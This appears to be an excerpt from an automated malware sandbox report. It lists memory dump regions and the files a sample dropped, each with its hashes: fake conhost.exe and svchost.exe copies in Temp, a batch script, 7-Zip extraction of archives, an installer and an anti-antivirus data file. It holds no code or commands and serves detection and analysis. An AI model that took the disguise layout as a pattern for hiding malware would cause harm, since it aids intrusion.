memory/2364-11-0x00000000079F0000-0x0000000007A02000-memory.dmp
memory/2364-12-0x0000000007A50000-0x0000000007A8E000-memory.dmp
memory/2364-13-0x0000000007A90000-0x0000000007ADB000-memory.dmp
memory/2364-14-0x0000000008D30000-0x0000000008D96000-memory.dmp
memory/2364-15-0x0000000009040000-0x0000000009090000-memory.dmp
memory/2364-16-0x0000000009E00000-0x0000000009FC2000-memory.dmp
memory/2364-17-0x000000000A500000-0x000000000AA2C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\conhost.exe
| MD5 | 8340b7602e82921aa8d72ae4f8ea11cc |
| SHA1 | a49524d26639130bc09acb4a0187917fbc5ec003 |
| SHA256 | efee38133480e7ccaa11424d49bb3d8ebdb89ffb1d81a10f6c405337e7d3a737 |
| SHA512 | eab92e881f24d6fdcb061540c3ee96f4d4fa9e26a7ef1ea82743ebca3e64821f94467cc65a2c3e83ee4c9091cc4e714e938b9f583c3dc9f88938555322e04f10 |
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 4edd28bf306d37273a4b30ef3f75d92f |
| SHA1 | db8fbd39931f0faaa160c700435279210bf97cc3 |
| SHA256 | e49d849e2a89613a493a07ee4f15f56cde89073e1dc527a4881846dd03eaa130 |
| SHA512 | b05fb8ff44ce032d09f096de855d99d64f64c03dead392863aa186edd05809fc99825862432dc7b826447b5880fe7b1eeb6135502df35d0227c16691665530df |
C:\Users\Admin\AppData\Local\Temp\main\file.bin
| MD5 | fc7c63ffa72326c3641efbdf507ab046 |
| SHA1 | a65964ee890eabc1e09d16ad4a36fa0530290435 |
| SHA256 | 3bac3a7196c4e1f347bbfc4bb7319c14a60155edadb246cc41f3a251b76f3bf6 |
| SHA512 | 39168751411ceff6b44013bb3eb2ca4a59c6b11f119d3fac72fcf85d401113170dd056d8dcdce29f0f60b38feedc0cb4bc72461ed32c17d6a616c446eacd62e8 |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
| MD5 | 7f93db1b1ba5dd798ee0fb7ac1ee5b5a |
| SHA1 | b68db4bdb7ad77c720a1861ec9158b49b99c3473 |
| SHA256 | 50806e50951c2ab080a1ad10873349940355d49cbecf564bdc4d3ca65516dff2 |
| SHA512 | 41e7df8738ef3f549d20c3943d0a4b2aa34e91675604d0bec62fa6633d7fb262a38adcde70b8c08639cbf9d62cf043b4220b8fc20483f061687815da22faef5a |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
| MD5 | ca8acb796044d922702f2fedd039c718 |
| SHA1 | 45b997cc60b4875eec3f462006f1605dcb16c984 |
| SHA256 | 710634857b5c70a6b6f014da45b0e1705a180aca3f2c1d53c39aa179d2451671 |
| SHA512 | 591c1da7c720500440aa47bc52423457d0963eca381451a6163a144c0168ed863b45872020a2a6fa645b97db397e93060265f7c150616a039c2aed25cd0607da |
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe
| MD5 | 6141fcd89a442521fabada983b07696a |
| SHA1 | c884d75aa3df2ab52ad128146e45825466db257e |
| SHA256 | 5a4414a62987d89c24f62ba447cb25b3310a4e543dcb505a807e62a77d8d1426 |
| SHA512 | 5f482678d7c71127d67f9b52d3e4c4e99111a4a2bbcbf36e299f57c6fffb354a490d573ee565b99483ac9b3ff015fc9337dffdb5d739a94d1994662a5dde0107 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
| MD5 | b5e813efd092c823e641722e0e721cf2 |
| SHA1 | e381b6fc4a362091a4b09e6e366d15efdb6820d3 |
| SHA256 | fe75fd8c297d1d223ba238caa95e2d3bd9436538d125c8b87f62a297aeb11b42 |
| SHA512 | be677d3811cd2a3f6b187ac53e7086307776abc9fef39165c4b0a54aceaa332a88da84e4ce4234a653c12a2a57dabd77ddf74b40ae9e709436b8ac6ef7d96283 |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 2c1b47e61eea814395d12967f51eedba |
| SHA1 | 85593a9de1515caad975be4ec2e95d2451cb8246 |
| SHA256 | cad7a1b429d70e52ee7d52b474e30318c7196fb9f12400e030387e48316e6373 |
| SHA512 | 77e7e5314095f77dc8c7c0b3b20d485e4e30f85dc2c8536bc56fc00f5ac23bd1a8d1a7bf2a6249f03a9daa55cf222e049058d8375e3c60de72406cdaefff02be |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 995201bd2171b22a161c689db920afa6 |
| SHA1 | 09871ed7f73b9a80b3e2a8771afffdec7fbf663c |
| SHA256 | ff5bf4791c645ee863365f11206d2fb3188343f141624b35779c52816e27a13e |
| SHA512 | 68fd5796bff605ef0864ac25699db76cfd9dc7e3a6141bfb0902aa2977373cf66607294787635b83a2c0b29dcba39a11863b97982a6f26a05288b0551e9f822e |
memory/2788-66-0x0000000000690000-0x0000000000D18000-memory.dmp
memory/2788-65-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/2788-67-0x0000000005C00000-0x0000000005C9C000-memory.dmp
memory/2364-68-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/2788-70-0x0000000005F00000-0x0000000006250000-memory.dmp
memory/2788-69-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-72-0x0000000006250000-0x00000000064A6000-memory.dmp
memory/2364-74-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/2788-75-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/2788-76-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-77-0x00000000068F0000-0x0000000006A82000-memory.dmp
\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
| MD5 | 544cd51a596619b78e9b54b70088307d |
| SHA1 | 4769ddd2dbc1dc44b758964ed0bd231b85880b65 |
| SHA256 | dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd |
| SHA512 | f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719 |
memory/2788-83-0x00000000032A0000-0x00000000032B0000-memory.dmp
memory/2788-84-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-87-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-86-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-89-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-88-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-85-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-90-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-91-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/776-93-0x0000000000400000-0x000000000040E000-memory.dmp
memory/2788-92-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-94-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/776-97-0x00000000054B0000-0x00000000054C0000-memory.dmp
memory/776-95-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/776-98-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-101-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-99-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-102-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-100-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-104-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-103-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-106-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-109-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-108-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-112-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-114-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-115-0x0000000000400000-0x000000000040E000-memory.dmp
memory/776-117-0x0000000000400000-0x000000000040E000-memory.dmp
memory/4252-128-0x0000000000400000-0x000000000040C000-memory.dmp
memory/1872-133-0x0000000000860000-0x0000000000960000-memory.dmp
memory/4252-134-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/4252-135-0x00000000050B0000-0x00000000050C0000-memory.dmp
memory/2788-138-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/208-140-0x0000000006640000-0x0000000006676000-memory.dmp
memory/2788-139-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/208-141-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/208-144-0x0000000006E10000-0x0000000007438000-memory.dmp
memory/2788-143-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-142-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-146-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/2788-145-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/208-147-0x0000000006D60000-0x0000000006D82000-memory.dmp
memory/208-148-0x0000000007440000-0x00000000074A6000-memory.dmp
memory/208-149-0x0000000007660000-0x000000000767C000-memory.dmp
memory/208-150-0x0000000007C90000-0x0000000007CDB000-memory.dmp
memory/208-151-0x0000000007DE0000-0x0000000007E56000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s2gbtavo.0qj.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/208-168-0x0000000008E90000-0x0000000008EC3000-memory.dmp
memory/2788-169-0x0000000005E00000-0x0000000005F00000-memory.dmp
memory/208-170-0x0000000070310000-0x000000007035B000-memory.dmp
memory/776-171-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/208-173-0x000000007F270000-0x000000007F280000-memory.dmp
memory/208-172-0x0000000008E70000-0x0000000008E8E000-memory.dmp
memory/208-178-0x0000000009010000-0x00000000090B5000-memory.dmp
memory/208-179-0x00000000067D0000-0x00000000067E0000-memory.dmp
memory/208-180-0x00000000091D0000-0x0000000009264000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | db01a2c1c7e70b2b038edf8ad5ad9826 |
| SHA1 | 540217c647a73bad8d8a79e3a0f3998b5abd199b |
| SHA256 | 413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d |
| SHA512 | c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 99c90c326481f56c85dd35d84c79adf2 |
| SHA1 | abae424259d56d1d724ad4c22812576f466a3bc5 |
| SHA256 | 217c98f50549795fccb4bbc2f8cf9bfc31bce93ce300e1c16fbc3b31d6282ece |
| SHA512 | a128ecfcdf9e5348edc2b879d9f4428d693ba4a80b7339c4ee45ee15a31c1e7f4f3d1e6c09e424e3ba65ecc8a0a9d72075ef7a00fbcf249539c3dceab68719ab |